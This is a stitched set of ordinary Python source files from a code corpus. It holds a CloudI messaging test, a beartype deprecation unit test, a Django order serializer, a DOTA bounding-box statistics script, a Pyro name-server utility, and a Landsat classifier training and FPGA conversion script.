self.__api.subscribe('a/b/*', self.__sequence1_ab__)
self.__api.subscribe('a/*/d', self.__sequence1_a__d)
self.__api.subscribe('*/c/d', self.__sequence1___cd)
self.__api.subscribe('a/*', self.__sequence1_a___)
self.__api.subscribe('*/d', self.__sequence1____d)
self.__api.subscribe('*', self.__sequence1_____)
self.__api.subscribe('sequence1', self.__sequence1)
self.__api.subscribe('e', self.__sequence2_e1)
self.__api.subscribe('e', self.__sequence2_e2)
self.__api.subscribe('e', self.__sequence2_e3)
self.__api.subscribe('e', self.__sequence2_e4)
self.__api.subscribe('e', self.__sequence2_e5)
self.__api.subscribe('e', self.__sequence2_e6)
self.__api.subscribe('e', self.__sequence2_e7)
self.__api.subscribe('e', self.__sequence2_e8)
self.__api.subscribe('sequence2', self.__sequence2)
self.__api.subscribe('f1', self.__sequence3_f1)
self.__api.subscribe('f2', self.__sequence3_f2)
self.__api.subscribe('g1', self.__sequence3_g1)
self.__api.subscribe('sequence3', self.__sequence3)
if self.__thread_index == 0:
# start sequence1
self.__api.send_async(
self.__api.prefix() + 'sequence1', b'1',
)
result = self.__api.poll()
assert result is False
except self.__terminate_exception:
pass
except Exception:
traceback.print_exc(file=sys.stderr)
print('terminate messaging %s' % self.__name)
def __sequence1_abcd(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/b/c/d')
assert request == b'test1'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_abc_(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/b/c/*')
assert request == b'test2' or request == b'test3'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_ab_d(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/b/*/d')
assert request == b'test4' or request == b'test5'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_a_cd(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/*/c/d')
assert request == b'test6' or request == b'test7'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1__bcd(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + '*/b/c/d')
assert request == b'test8' or request == b'test9'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_ab__(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/b/*')
assert request == b'test10'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_a__d(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/*/d')
assert request == b'test11'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1___cd(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + '*/c/d')
assert request == b'test12'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_a___(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/*')
assert request == b'test13'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1____d(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + '*/d')
assert request == b'test14'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_____(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + '*')
assert request == b'test15'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
# pylint: disable=too-many-statements
# consume all the 'end' responses from all sequences handled
# by this service
while self.__api.recv_async(timeout=1000)[1] == b'end':
pass
iteration = int(request)
print('messaging sequence1 start %s (%d)' % (
self.__name,
iteration,
))
test1_id = self.__api.send_async(
self.__api.prefix() + 'a/b/c/d', b'test1'
)
test2_id = self.__api.send_async(
self.__api.prefix() + 'a/b/c/z', b'test2'
)
test3_id = self.__api.send_async(
self.__api.prefix() + 'a/b/c/dd', b'test3'
)
test4_id = self.__api.send_async(
self.__api.prefix() + 'a/b/z/d', b'test4'
)
test5_id = self.__api.send_async(
self.__api.prefix() + 'a/b/cc/d', b'test5'
)
test6_id = self.__api.send_async(
self.__api.prefix() + 'a/z/c/d', b'test6'
)
test7_id = self.__api.send_async(
self.__api.prefix() + 'a/bb/c/d', b'test7'
)
test8_id = self.__api.send_async(
self.__api.prefix() + 'z/b/c/d', b'test8'
)
test9_id = self.__api.send_async(
self.__api.prefix() + 'aa/b/c/d', b'test9'
)
test10_id = self.__api.send_async(
self.__api.prefix() + 'a/b/czd', b'test10'
)
test11_id = self.__api.send_async(
self.__api.prefix() + 'a/bzc/d', b'test11'
)
test12_id = self.__api.send_async(
self.__api.prefix() + 'azb/c/d', b'test12'
)
test13_id = self.__api.send_async(
self.__api.prefix() + 'a/bzczd', b'test13'
)
test14_id = self.__api.send_async(
self.__api.prefix() + 'azbzc/d', b'test14'
)
test15_id = self.__api.send_async(
self.__api.prefix() + 'azbzczd', b'test15'
)
# n.b., depends on cloudi_core_i_constants.hrl having
# RECV_ASYNC_STRATEGY == recv_async_select_oldest
self.__api.recv_async(trans_id=test1_id, consume=False)
(_, test1_check, test1_id_check) = self.__api.recv_async()
assert test1_check == b'test1'
assert test1_id_check == test1_id
self.__api.recv_async(trans_id=test2_id, consume=False)
(_, test2_check, test2_id_check) = self.__api.recv_async()
assert test2_check == b'test2'
assert test2_id_check == test2_id
self.__api.recv_async(trans_id=test3_id, consume=False)
(_, test3_check, test3_id_check) = self.__api.recv_async()
assert test3_check == b'test3'
assert test3_id_check == test3_id
self.__api.recv_async(trans_id=test4_id, consume=False)
(_, test4_check, test4_id_check) = self.__api.recv_async()
assert test4_check == b'test4'
assert test4_id_check == test4_id
self.__api.recv_async(trans_id=test5_id, consume=False)
(_, test5_check, test5_id_check) = self.__api.recv_async()
assert test5_check == b'test5'
assert test5_id_check == test5_id
self.__api.recv_async(trans_id=test6_id, consume=False)
(_, test6_check, test6_id_check) = self.__api.recv_async()
assert test6_check == b'test6'
assert test6_id_check == test6_id
self.__api.recv_async(trans_id=test7_id, consume=False)
(_, test7_check, test7_id_check) = self.__api.recv_async()
assert test7_check == b'test7'
assert test7_id_check == test7_id
self.__api.recv_async(trans_id=test8_id, consume=False)
(_, test8_check, test8_id_check) = self.__api.recv_async()
assert test8_check == b'test8'
assert test8_id_check == test8_id
self.__api.recv_async(trans_id=test9_id, consume=False)
(_, test9_check, test9_id_check) = self.__api.recv_async()
assert test9_check == b'test9'
assert test9_id_check == test9_id
self.__api.recv_async(trans_id=test10_id, consume=False)
(_, test10_check, test10_id_check) = self.__api.recv_async()
assert test10_check == b'test10'
assert test10_id_check == test10_id
self.__api.recv_async(trans_id=test11_id, consume=False)
(_, test11_check, test11_id_check) = self.__api.recv_async()
assert test11_check == b'test11'
assert test11_id_check == test11_id
self.__api.recv_async(trans_id=test12_id, consume=False)
(_, test12_check, test12_id_check) = self.__api.recv_async()
assert test12_check == b'test12'
assert test12_id_check == test12_id
self.__api.recv_async(trans_id=test13_id, consume=False)
(_, test13_check, test13_id_check) = self.__api.recv_async()
assert test13_check == b'test13'
assert test13_id_check == test13_id
self.__api.recv_async(trans_id=test14_id, consume=False)
(_, test14_check, test14_id_check) = self.__api.recv_async()
assert test14_check == b'test14'
assert test14_id_check == test14_id
self.__api.recv_async(trans_id=test15_id, consume=False)
(_, test15_check, test15_id_check) = self.__api.recv_async()
assert test15_check == b'test15'
assert test15_id_check == test15_id
print('messaging sequence1 end %s (%d)' % (
self.__name,
iteration,
))
# start sequence2
self.__api.send_async(self.__api.prefix() + 'sequence2', request)
self.__api.return_(request_type, name, pattern,
b'', b'end', timeout, trans_id, pid)
def __sequence2_e1(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'1', timeout, trans_id, pid)
def __sequence2_e2(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'2', timeout, trans_id, pid)
def __sequence2_e3(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'3', timeout, trans_id, pid)
def __sequence2_e4(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'4', timeout, trans_id, pid)
def __sequence2_e5(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'5', timeout, trans_id, pid)
def __sequence2_e6(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'6', timeout, trans_id, pid)
def __sequence2_e7(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'7', timeout, trans_id, pid)
def __sequence2_e8(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'8', timeout, trans_id, pid)
def __sequence2(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
iteration = int(request)
print('messaging sequence2 start %s (%s)' % (
self.__name,
iteration,
))
while True:
# the sending process is excluded from the services that receive
# the asynchronous message, so in this case, the receiving thread
# will not be called, despite the fact it has subscribed to 'e',
# to prevent a process (in this case thread) from deadlocking
# with itself.
e_ids = self.__api.mcast_async(self.__api.prefix() + 'e', b' ')
# 4 * 8 == 32, but only 3 out of 4 threads can receive messages,
# since 1 thread is sending the mcast_async, so 3 * 8 == 24
if len(e_ids) == 24:
e_check_list = []
for e_id in e_ids:
(_,
e_check,
e_id_check) = self.__api.recv_async(trans_id=e_id)
assert e_id == e_id_check
e_check_list.append(e_check)
e_check_list.sort()
assert b''.join(e_check_list) == b'111222333444555666777888'
break
else:
print('Waiting for %s services to initialize' % (
str(4 - len(e_ids) / 8.0),
))
for e_id in e_ids:
(_,
e_check,
e_id_check) = self.__api.recv_async(trans_id=e_id)
assert e_id == e_id_check
null_id = self.__api.recv_async(timeout=1000)[2]
assert null_id == b'\0' * 16
print('messaging sequence2 end %s (%s)' % (
self.__name,
iteration,
))
# start sequence3
self.__api.send_async(self.__api.prefix() + 'sequence3', request)
self.__api.return_(request_type, name, pattern,
b'', b'end', timeout, trans_id, pid)
def __sequence3_f1(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
request_i = int(request)
if request_i == 4:
return b'done'
request_new = request_i + 2 # two steps forward
self.__api.forward_(request_type, self.__api.prefix() + 'f2',
request_info,
('%d' % request_new).encode('ascii'),
timeout, priority, trans_id, pid)
return None # execution doesn't get here
def __sequence3_f2(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
request_i = int(request)
request_new = request_i - 1 # one step back
self.__api.forward_(request_type, self.__api.prefix() + 'f1',
request_info,
('%d' % request_new).encode('ascii'),
timeout, priority, trans_id, pid)
def __sequence3_g1(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', request + b'suffix', timeout, trans_id, pid)
def __sequence3(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
iteration = int(request)
print('messaging sequence3 start %s (%s)' % (
self.__name,
iteration,
))
test1_id = self.__api.send_async(
self.__api.prefix() + 'f1', b'0'
)
(_, test1_check, test1_id_check) = self.__api.recv_async(
trans_id=test1_id
)
assert test1_id_check == test1_id
assert test1_check == b'done'
(_, test2_check, _) = self.__api.send_sync(
self.__api.prefix() + 'g1', b'prefix_'
)
assert test2_check == b'prefix_suffix'
print('messaging sequence3 end %s (%s)' % (
self.__name,
iteration,
))
# loop to find any infrequent problems, restart sequence1
iteration += 1
self.__api.send_async(
self.__api.prefix() + 'sequence1',
('%d' % iteration).encode('ascii'),
)
self.__api.return_(request_type, name, pattern,
b'', b'end', timeout, trans_id, pid)
def _main():
thread_count = API.thread_count()
assert thread_count >= 1
threads = [Task(thread_index, 'python', TerminateException)
for thread_index in range(thread_count)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
_main()
|
StarcoderdataPython
|
1841711
|
<filename>beartype_test/a00_unit/a00_util/mod/test_utilmoddeprecate.py
#!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2022 Beartype authors.
# See "LICENSE" for further details.
'''
Project-wide **Python module deprecation** unit tests.
This submodule unit tests the public API of the private
:mod:`beartype._util.mod.utilmoddeprecate` submodule.
'''
# ....................{ IMPORTS }....................
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# WARNING: To raise human-readable test errors, avoid importing from
# package-specific submodules at module scope.
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# ....................{ TESTS }....................
def test_deprecate_module_attr() -> None:
'''
Test the
:func:`beartype._util.mod.utilmoddeprecate.deprecate_module_attr` function.
'''
# Defer heavyweight imports.
from beartype._util.mod.utilmoddeprecate import deprecate_module_attr
from pytest import raises, warns
# Dictionary mapping from the deprecated to non-deprecated name of
# arbitrary objects masquerading as deprecated and non-deprecated
# attributes (respectively) of an arbitrary submodule.
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME = {
# Deprecated names originating from public non-deprecated names in the
# "ATTR_NONDEPRECATED_NAME_TO_VALUE" dictionary defined below.
'Robes_some_unsculptured_image': 'Thine_earthly_rainbows',
# Deprecated names originating from private non-deprecated names in
# that dictionary, exercising an edge case.
'The_strange_sleep': '_Of_the_aethereal_waterfall',
# Deprecated names originating from non-deprecated names *NOT* in that
# dictionary, exercising an edge case.
'Wraps_all_in': 'its_own_deep_eternity',
}
# Dictionary mapping from the name to value of arbitrary objects
# masquerading as non-deprecated attributes of an arbitrary submodule.
ATTR_NONDEPRECATED_NAME_TO_VALUE = {
'Thine_earthly_rainbows': "stretch'd across the sweep",
'_Of_the_aethereal_waterfall': 'whose veil',
# Globally scoped attribute required by deprecate_module_attr().
'__name__': 'Lines.Written_in_the.Vale_of.Chamouni',
}
# Assert this function both emits the expected warning and returns the
# expected value of a deprecated attribute originating from a public
# non-deprecated attribute of an arbitrary submodule.
with warns(DeprecationWarning):
assert deprecate_module_attr(
attr_deprecated_name='Robes_some_unsculptured_image',
attr_deprecated_name_to_nondeprecated_name=(
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME),
attr_nondeprecated_name_to_value=ATTR_NONDEPRECATED_NAME_TO_VALUE,
) == "stretch'd across the sweep"
# Assert this function both emits the expected warning and returns the
# expected value of a deprecated attribute originating from a private
# non-deprecated attribute of an arbitrary submodule.
with warns(DeprecationWarning):
assert deprecate_module_attr(
attr_deprecated_name='The_strange_sleep',
attr_deprecated_name_to_nondeprecated_name=(
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME),
attr_nondeprecated_name_to_value=ATTR_NONDEPRECATED_NAME_TO_VALUE,
) == 'whose veil'
# Assert this function raises the expected exception when passed any name
# other than that of a deprecated attribute.
with raises(AttributeError):
assert deprecate_module_attr(
attr_deprecated_name='Which when the voices of the desert fail',
attr_deprecated_name_to_nondeprecated_name=(
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME),
attr_nondeprecated_name_to_value=ATTR_NONDEPRECATED_NAME_TO_VALUE,
)
# Assert this function raises the expected exception when passed the name
# of a deprecated attribute whose corresponding non-deprecated attribute is
# *NOT* defined by this submodule.
with raises(AttributeError):
assert deprecate_module_attr(
attr_deprecated_name='Wraps_all_in',
attr_deprecated_name_to_nondeprecated_name=(
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME),
attr_nondeprecated_name_to_value=ATTR_NONDEPRECATED_NAME_TO_VALUE,
)
|
StarcoderdataPython
|
92373
|
from .binarytrees import *
|
StarcoderdataPython
|
1944884
|
<gh_stars>1-10
from django.core.exceptions import ValidationError
from rest_framework import serializers
from .models import Order
class OrderSerializer(serializers.ModelSerializer):
"""Serializer definition for Order."""
status = serializers.CharField(source="get_status_display", read_only=True)
class Meta:
model = Order
fields = "__all__"
read_only = ("id", "made_at")
def validate_customer(self, value):
"""Customer id validation.
Args:
value (int): Customer id.
Returns:
value (int): Customer id.
"""
        if value <= 0:
            raise ValidationError("Must be greater than 0.")
return value
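    # Illustrative sketch of the field-level validation above (assumes a configured
    # Django/DRF project; the remaining required Order fields are omitted here):
    #
    #   serializer = OrderSerializer(data={"customer": -1})
    #   serializer.is_valid()  # False - "customer" fails validate_customer()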
|
StarcoderdataPython
|
1898675
|
<filename>stats_bbox_tr.py
import os
from os import listdir
from os.path import join
from bbox_tr import bbox_tr_get_wh
in_dir = r'E:\SourceCode\Python\TRD\DOTA'
out_dir = r'E:\SourceCode\Python\TRD'
cls_stats = {}
valid_objs = 0
total_objs = 0
for i in os.listdir(in_dir):
image_id,image_ext = os.path.splitext(i)
if image_ext.lower() == '.txt':
in_file = open(join(in_dir,i), 'r')
for line in in_file:
parts = line.split()
if len(parts) > 6:
cls_id = int(parts[0])
bbox = [float(x) for x in parts[1:7]]
w,h = bbox_tr_get_wh(bbox)
if w <= 0.0:
continue
total_objs = total_objs + 1
if w >= 12:
valid_objs = valid_objs+1
ar = h/w
if cls_id in cls_stats:
cls_stat = cls_stats[cls_id]
if cls_stat[0] > ar:
cls_stat[0] = ar
if cls_stat[1] < ar:
cls_stat[1] = ar
cls_stat[2] = cls_stat[2] + ar
if cls_stat[3] > w:
cls_stat[3] = w
if cls_stat[4] < w:
cls_stat[4] = w
if cls_stat[5] > h:
cls_stat[5] = h
if cls_stat[6] < h:
cls_stat[6] = h
cls_stat[7] = cls_stat[7] + 1
else:
cls_stats[cls_id] = [ar,ar,ar,w,w,h,h,1]
in_file.close()
for cls_id in cls_stats:
cls_stat = cls_stats[cls_id]
cls_stat[2] = cls_stat[2]/cls_stat[7]
cls_stats_file = open(join(out_dir,"cls_stats.txt"), 'w')
for cls_id in cls_stats:
cls_stat = cls_stats[cls_id]
cls_stats_file.write( '%3d, %6.3f, %6.3f, %6.3f, %6.3f, %6.3f, %6.3f, %6.3f, %5d\n'%(
cls_id,cls_stat[0],cls_stat[1],cls_stat[2],
cls_stat[3],cls_stat[4],cls_stat[5],cls_stat[6],
cls_stat[7])
)
cls_stats_file.write('valid_objs = %d\n' % valid_objs)
cls_stats_file.write('total_objs = %d'%total_objs)
cls_stats_file.close()
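# Each row written to cls_stats.txt is:
#   cls_id, min_ar, max_ar, mean_ar, min_w, max_w, min_h, max_h, object_count
# where ar is the height/width aspect ratio of each oriented bounding box.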
|
StarcoderdataPython
|
179100
|
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Name server control module. Slightly enhanced for QA package.
"""
from pycopia.remote import pyro
def print_listing(listing):
for name, uri in sorted(listing.items()):
if len(uri) > 45:
print(("{:>35.35s} --> \n{:>79.79s}".format(name, uri)))
else:
print(("{:>35.35s} --> {}".format(name, uri)))
_DOC = """nsc [-h?]
Control or query the name server.
Subcommands:
list - show current objects.
ping - No error if server is reachable.
remove <name> - remove the named agent entry.
"""
def nsc(argv):
import getopt
try:
optlist, args = getopt.getopt(argv[1:], "h?")
except getopt.GetoptError:
print(_DOC)
return 2
for opt, optarg in optlist:
if opt in ("-h", "-?"):
print(_DOC)
return
try:
subcmd = args[0]
except IndexError:
print(_DOC)
return 2
args = args[1:]
nameserver = pyro.locate_nameserver()
if subcmd.startswith("li"):
if args:
print_listing(nameserver.list(prefix=args[0]))
else:
print_listing(nameserver.list())
elif subcmd.startswith("pi"):
nameserver.ping()
print("Name server is alive.")
if subcmd.startswith("rem"):
if args:
nameserver.remove(name=args[0])
else:
print(_DOC)
return 2
if __name__ == "__main__":
import sys
from pycopia import autodebug
nsc(sys.argv)
|
StarcoderdataPython
|
11288249
|
#%%
import os
import numpy as np
import matplotlib.pyplot as plt
import json
from soil_classifier.dataset import Landsat
from soil_classifier.models import minimals as models_lib
from soil_classifier.utils import fpga_report, load_model
from soil_classifier.utils import model_checkout, ip_checkout
from soil_classifier.utils import make_config, save_config
from soil_classifier.utils import convert, build
cwd = os.getcwd()
DATA_FOLDER = cwd + '/data/'
OUTPUT_FOLDER = cwd + '/outputs/'
MODELS_FOLDER = cwd + '/models/'
CONFIG_FOLDER = cwd + '/configs/'
FPGA_FOLDER = cwd + '/fpga/'
IPS_FOLDER = cwd + '/ip/'
MODEL_SRC_PATH = OUTPUT_FOLDER
MODEL_DST_PATH = MODELS_FOLDER
#%% PARAMETERS
SEED = 0
# Model
MODEL_NAME = 'ANN50x50'
# MODEL_NAME = 'ANN100x100'
# Dataset
X_DATA_PROC = 'standarization' # options: standarization/normalization/original
Y_DATA_PROC = 'one-hot'
FPGA_DATA_FORMAT = '%.6f'
# Training
retrain = False
N_epochs = 200
batch_size = 32
do_model_checkout = True
# Config (conversion Keras to HLS)
# The max number of multipliers should be less than 4096; adjust reuse_factor to stay within this limit.
PART = 'xazu7eg-fbvb900-1-i'
T_CLK = 24 # ns
IO_TYPE = 'io_parallel' # options: io_serial/io_parallel
PRECISION = [16, 10]
REUSE_FACTOR = 4
# REUSE_FACTOR = 100
# STRATEGY = 'Latency' # options: Latency/Resource
STRATEGY = 'Resource' # options: Latency/Resource
# Layer config (optional and only if it is necessary)
# this parameter should be a list of dictionaries.
# by name:
# layers = [{'name': < >, 'reuse_factor': < >, 'strategy': < >, 'compression': < >}]
# by type:
# layers = [{'type': < >, 'reuse_factor': < >, 'strategy': < >, 'compression': < >}]
# default values: strategy: 'Latency', compression: False
# Default
LAYERS_CONFIG = None
# Custom
# LAYERS_CONFIG = [{
# 'name': 'fc1',
# 'reuse_factor': 10
# },
# {
# 'name': 'fc2',
# 'reuse_factor': 10
# },
# {
# 'name': 'predictions',
# 'reuse_factor': 6
# }
# ]
# Conversion
HLS_PROJECT = 'hls_' + MODEL_NAME
FPGA_PROJECT = 'fpga_' + MODEL_NAME
CONFIG_FILE = CONFIG_FOLDER + 'keras_config_{model_name}.yml'.format(model_name=MODEL_NAME)
FPGA_PROJECT_FOLDER = FPGA_FOLDER + 'hls_' + MODEL_NAME + '/'
FPGA_INFERENCE_FILE = FPGA_PROJECT_FOLDER + 'tb_data/rtl_cosim_results.log'
OUTPUT_REPORT_FILE = OUTPUT_FOLDER + MODEL_NAME + '_report.json'
# Exporting
do_ip_checkout = True
IP_SRC_PATH = FPGA_PROJECT_FOLDER+'fpga_'+MODEL_NAME+'_prj/solution1/impl/ip/'
IP_DST_PATH = IPS_FOLDER
np.random.seed(SEED)
parameter_report = {'params': {
'model_name': MODEL_NAME,
'dataset': 'Landsat',
'x_data_proc': X_DATA_PROC,
'y_data_proc': Y_DATA_PROC,
'fpga_data_format': FPGA_DATA_FORMAT,
'epochs': N_epochs,
'batch_size': batch_size,
'part': PART,
't_clk': T_CLK,
'io_type': IO_TYPE,
'precision': PRECISION,
'reuse_factor': REUSE_FACTOR,
'strategy': STRATEGY
}}
#%% some functions
def isnotebook():
try:
shell = get_ipython().__class__.__name__
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
except NameError:
return False # Probably standard Python interpreter
# %% Dataset loading
print('\nDataset loading and processing')
dataset = Landsat()
dataset.load(shuffle=True, seed=SEED)
x_train, y_train, x_test, y_test = dataset.posprocess(x_proc_type=X_DATA_PROC, y_proc_type=Y_DATA_PROC)
print('\nSaving data in text (dat) file for FPGA synth testing...')
DATASET_NAME = dataset.name
np.savetxt(DATA_FOLDER+DATASET_NAME+'_x_train.dat', x_train, fmt=FPGA_DATA_FORMAT)
np.savetxt(DATA_FOLDER+DATASET_NAME+'_y_train.dat', y_train, fmt=FPGA_DATA_FORMAT)
np.savetxt(DATA_FOLDER+DATASET_NAME+'_x_test.dat', x_test, fmt=FPGA_DATA_FORMAT)
np.savetxt(DATA_FOLDER+DATASET_NAME+'_y_test.dat', y_test, fmt=FPGA_DATA_FORMAT)
TEST_FILES = [DATASET_NAME+'_x_test.dat', DATASET_NAME+'_y_test.dat']
print('done!')
#%% Model loading or Training
if retrain == False:
try:
model = models_lib.new_model(MODEL_NAME)
model.load(MODEL_NAME, path=MODELS_FOLDER, verbose=1)
model.compile()
model.summary()
except:
        print('Model loading failed! Retraining the model.')
retrain = True
if retrain == True:
print('\nLoading and compiling model {}'.format(MODEL_NAME))
model = models_lib.new_model(MODEL_NAME)
model.compile()
model.summary()
print('\nTraining')
history = model.fit(x_train, y_train,
epochs=N_epochs, batch_size=batch_size,
validation_data=(x_test, y_test))
#%% evaluation
print('\n')
# show train accuracy
train_score = model.evaluate(x_train, y_train, verbose=0)
print('MODEL {} - train accuracy = {:.3f}'.format(model.name, train_score[1]))
# show test accuracy
test_score = model.evaluate(x_test, y_test, verbose=0)
print('MODEL {} - test accuracy = {:.3f}'.format(model.name, test_score[1]))
if retrain == True:
    # append epochs to history
epochs = range(1,N_epochs+1)
history.history.update( {'epochs': epochs})
# save history
np.save(OUTPUT_FOLDER+'history_{}.npy'.format(model.name), history.history)
print( 'Training history saved in ' + OUTPUT_FOLDER + 'history_{}.npy'.format(model.name) )
# Plot training results
print('\nSaving training plots in ' + OUTPUT_FOLDER)
# loss
fig = plt.figure(figsize=(16,8))
plt.plot(epochs, history.history['loss'], label='loss')
plt.plot(epochs, history.history['val_loss'], label='val_loss')
plt.xlabel('epochs')
plt.ylabel('loss value')
plt.xlim(xmin=1)
plt.ylim(ymin=0)
plt.grid()
plt.legend()
plt.title('{} model - Loss'.format(model.name))
fig.savefig(OUTPUT_FOLDER+'{}_loss.png'.format(model.name))
# plt.show(block=False)
# acc
fig = plt.figure(figsize=(16,8))
plt.plot(epochs, history.history['acc'], label='acc')
plt.plot(epochs, history.history['val_acc'], label='val_acc')
plt.xlabel('epochs')
    plt.ylabel('accuracy')
plt.xlim(xmin=1)
plt.ylim(ymin=0.6, ymax=1.01)
plt.grid()
plt.legend()
plt.title('{} model - Accuracy'.format(model.name))
fig.savefig(OUTPUT_FOLDER+'{}_acc.png'.format(model.name))
# plt.show(block=False)
# %% save model
print('\nSaving model in ' + OUTPUT_FOLDER)
model.save(OUTPUT_FOLDER)
#%% checkout model
print('\n')
# check if you are not in a ipython notebook
if not isnotebook() and retrain:
terminal_input = input('Do you want to checkout your model (it overrides previous model with same name) y/[n]: ')
if terminal_input == 'y':
do_model_checkout = True
else:
do_model_checkout = False
print('Model checkout denied!')
if do_model_checkout:
print('Doing model checkout...')
model_checkout(model.name, src_path=MODEL_SRC_PATH, dst_path=MODEL_DST_PATH)
else:
print('Your model has not been checked out, look for it in ' + OUTPUT_FOLDER )
#%% Create config file
CONFIG_FILE = CONFIG_FOLDER + 'keras_config_{model_name}.yml'.format(model_name=model.name)
config_str = make_config(model_name=model.name,
part=PART,
t_clk=T_CLK,
io_type=IO_TYPE,
precision=[PRECISION[0], PRECISION[1]],
reuse_factor=REUSE_FACTOR,
strategy=STRATEGY,
layers=LAYERS_CONFIG,
test_data=TEST_FILES,
root_path=cwd)
save_config(config_str, CONFIG_FILE)
